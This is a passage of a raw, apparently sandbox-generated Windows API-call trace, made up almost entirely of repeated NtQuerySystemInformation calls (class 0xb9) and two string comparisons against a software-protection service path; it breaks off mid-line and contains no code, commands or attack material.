NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4c0, Length=0x48, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x28, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.963] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x28, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x48, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4c0, Length=0x48, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x28, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x28, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd6a0, Length=0x40, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.964] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0226.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0226.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0226.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0226.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0226.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.965] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0226.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0226.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.966] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0226.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0226.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0226.969] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0226.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0226.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0226.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.970] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0226.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.972] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0226.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0226.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0226.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0226.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0226.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0226.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.973] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0226.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0226.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x20, ResultLength=0x0) [0226.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x20, ResultLength=0x0) [0226.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.974] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0226.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0226.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd390, Length=0x50, ResultLength=0x0) [0226.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0226.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0226.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0226.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.975] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x50, ResultLength=0x0) [0226.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.976] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0226.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0226.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0226.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.980] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x28, ResultLength=0x0) [0226.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0226.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0226.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.981] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0226.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.983] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0226.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0226.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0226.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0226.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0226.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0226.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x38, ResultLength=0x0) [0226.984] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x20, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfc0, Length=0x20, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0226.985] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x28, ResultLength=0x0) [0226.986] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0226.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0226.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0226.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0226.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.986] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0226.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0226.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0226.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0226.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd210, Length=0x28, ResultLength=0x0) [0226.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.990] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0226.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.991] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0226.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.995] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x20, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.996] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd370, Length=0x38, ResultLength=0x0) [0226.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x20, ResultLength=0x0) [0226.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x20, ResultLength=0x0) [0226.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x20, ResultLength=0x0) [0226.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.997] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0226.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x28, ResultLength=0x0) [0226.998] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0226.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0226.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0226.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd440, Length=0x50, ResultLength=0x0) [0226.998] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, 